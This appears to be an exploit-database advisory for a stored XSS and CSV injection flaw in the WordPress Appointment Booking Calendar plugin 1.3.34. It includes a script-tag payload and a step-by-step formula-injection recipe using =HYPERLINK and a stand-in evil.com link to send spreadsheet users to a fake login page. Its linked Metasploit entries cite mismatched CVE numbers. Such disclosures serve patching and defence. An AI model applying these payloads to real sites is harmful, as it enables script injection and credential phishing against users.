Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection

vendor:

Appointment Booking Calendar

by:

Daniel Monzón (stark0de)

7.8

CVSS

HIGH

Stored Cross-Site-Scripting and CSV Injection

CWE

Product Name: Appointment Booking Calendar

Affected Version From: 1.3.34

Affected Version To: 1.3.34

Patch Exists: Yes

Related CWE: CVE-2020-9371, CVE-2020-9372

CPE: a:codepeople:appointment_booking_calendar

Metasploit: https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2019-9371/, https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2019-9371/, https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2019-9371/, https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2019-9371/

Other Scripts: N/A

Platforms Tested: Windows 7 x86 SP1

2020

WordPress Plugin Appointment Booking Calendar 1.3.34 – CSV Injection

A vulnerability exists in Wordpress Plugin Appointment Booking Calendar 1.3.34 which allows an attacker to inject malicious code into the calendar name field and export a CSV file containing a malicious hyperlink. When the user clicks on the hyperlink, they are redirected to a fake login page.

Mitigation:

Update to the latest version of the plugin, or disable the plugin if it is not necessary.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372

----Stored Cross-Site-Scripting-------------------

1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click in any of the other tabs

----CSV injection---------------------------------

1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out) 
2) Then we go to the page and introduce data, and the payload:

New booking:

Name: IMPORTANT DATA
Description: http://evil.com/evil.php

New booking:

Name: test
Description: =HYPERLINK(K2;H2) 

This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel

3) Then we go to Bookings List and export the CSV file
4) After that we open the file, and import data from an external file, using comma as separator
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)

Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016